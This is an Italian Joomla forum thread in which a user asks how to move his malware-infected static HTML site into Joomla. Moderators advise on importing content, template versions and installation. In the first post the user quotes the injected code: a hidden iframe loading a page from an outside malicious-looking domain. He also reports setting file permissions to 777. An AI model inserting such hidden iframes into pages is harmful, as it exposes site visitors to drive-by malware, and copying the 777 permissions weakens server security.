Back to top

Autore Topic: Sono nuovo.  (Letto 2607 volte)

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
Sono nuovo.
« il: 23 Apr 2008, 18:59:54 »
Salve a tutti quanti, mi chiamo Massimo ho 25 anni, volevo innanzi tutto complimentarmi con voi per questo stilosissimo sito e molto molto omogeneo e intuitivo, ora vengo al dunque.

Ho un problema con il mio sito, Praticamente è affetto da un virus che pur togliendolo poi ritorna sempre, ne ho provate tutte e non so piu' che fare, allora un mio amico ha proposto di passare al cms, così forse si risolverebbe questo virus che si è andato ad annidare nel mio codice html
Codice: [Seleziona]
<div style="visibility:hidden"><iframe src="http://cds5fir.com/ld/grb/" width=100 height=80></iframe></div>
Comunque passiamo a Joomla, Il mio problema è che ho davvero tante sezioni e non saprei come inserirle in joomla, non so dove cominciare per portare tutto il contenuto dentro la nuova cms.

Il mio sito è: http://www.maxss.it come potete vedere, secondo voi con "semplici passi" riesco a fare un sito DOC?

Fatemi sapere cortesemente nel caso comincerò a scaricarlo e installarlo nel mio ftp.

Grazi infinitamente Massimo.

Offline Kriss

• Team Joomla.it
  • Abituale
    • Mostra profilo
Re: Sono nuovo.
« Risposta #1 il: 23 Apr 2008, 19:10:00 »
Ciao, benvenuto! il problema che hai con l'iframe l'ho visto presentarsi anche con joomla, sebbene una volta ripuliti gli index dovrebbe non presentarsi più...

in effetti le sezioni sono un bel po'... con pazienza e copia e incolla però potresti spostare tutto su qualcosa fatto con joomla... Sicuramente joomla è adatto per quel tipo di sito, un mio consiglio magari sarebbe quello di testarlo un po' in locale sul tuo computer, tramite xampp o easyphp, per verificare se rientra nel tuo gradimento!

In questo caso ricorda di acquisire acnhe il servizio MySQL dal tuo servizio di hosting...

Ciao
Ehi, l'email è solo per salutarmi!

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #2 il: 23 Apr 2008, 19:28:57 »
Grazie mille, quindi usando joomla non è detto che svio il problema?

Io ho anche un dominio in linux con un servizio mysql, http://lnx.maxss.it dove risiede anche il forum.

C'è un tutorial dove poter vedere magari come importare le pagine da html al sistema joomla?

Grazie davvero della gentilezza. Massimo.

Offline Kriss

• Team Joomla.it
  • Abituale
    • Mostra profilo
« Risposta #3 il: 23 Apr 2008, 19:48:06 »
Beh di trasferimenti di questo tipo non sono un maestro... certo che avendo i contenuti già su un db lacerei aperta qualche speranza... forse i geni dei database...

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #4 il: 23 Apr 2008, 19:56:55 »
mh, nel sito non centra nulla il database, i contenuti sono normali pagine html, il forum lascerei quello.. A me servirebbe solo per poter sostituire il mio sito in html nel cms joomla, e la mia paura e che magari  lo scarico installo e poi non riesco ad importare nulla :( e non svio il virus... che dite?

Un'altra cosa, io intanto ho  scaricato l'ultima versione di Joomla!, ho visto tantissimi template favolosi  :o ma molti sono alla versione 1.0, io che ho scaricato la 1.5 non sono compatibili? oppure non fa nessuna differenza, scusate queste domande così stupidine, ma essendo nuovo vorrei prima essere sicuro. Complimenti ancora.
« Ultima modifica: 23 Apr 2008, 20:47:27 da resetboy »

Offline ramses_2th

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #5 il: 24 Apr 2008, 08:52:42 »
Ciao, importare un contenuto html non è un problema, logicamente qualche modifica per adattare il testo al template dovrai farlo, ma la cosa è assolutamente fattibile (utiliza L'EDITOR HTML presente in joomla.

Le versione 1.0 ed 1.5 si differenzia anche nel modo di interpretare il template, quindi chelli creati per la 1.0 non sono adatti ( a meno che nn metti mano al codice) alla 1.5 e viceversa.

Visto che hai già lao spazio linux, fai un installazione di prova, giusto per verificare se è adattoallae tue esigenze, cmq vedendo come è strutturato il tuo sito, non dovresti avere problemi.

Ciao

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #6 il: 24 Apr 2008, 10:28:16 »
Ok ci provo e vi farò sapere, davvero grazie per tutta la pazienza che hai avuto con me, speriamo bene  ;D

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #7 il: 24 Apr 2008, 13:43:53 »
Ho provato a installare joomla su aruba linux, ecco qui

http://lnx.maxss.it/joomla/ non vi da errore? c'è una pagina da eseguire per l'installazione? i permessi li ho impostati a 777 cosa sbaglio?

Offline Kriss

• Team Joomla.it
  • Abituale
    • Mostra profilo
« Risposta #8 il: 24 Apr 2008, 13:51:08 »
L'installazione è fatta con la procedura di installazione di joomla direttamente sul server?

Ciao

Offline resetboy

• Nuovo arrivato
  • *
    • Mostra profilo
« Risposta #9 il: 24 Apr 2008, 14:00:29 »
mh, non trovo un tutorial per l'installazione per aruba - linux, solo per altervista. Ho hostato i file, e poi mi hanno detto che una volta inserito nell'ftp  si installava da solo.. e automaticamente appariva una pagina d'installazione... Ma a quanto pare non è così.

Offline ramses_2th

• Global Moderator
  • Instancabile
    • Mostra profilo
« Risposta #10 il: 24 Apr 2008, 15:07:00 »
Hai caricato tutti i file ? dovresti avere una cartella Installation

prova a ripristinare i permessi.

http://lnx.tuosito.it/login

inserisci mome e pass

clica su --- Ripristina Permessi ---

Web Design Bolzano Kreatif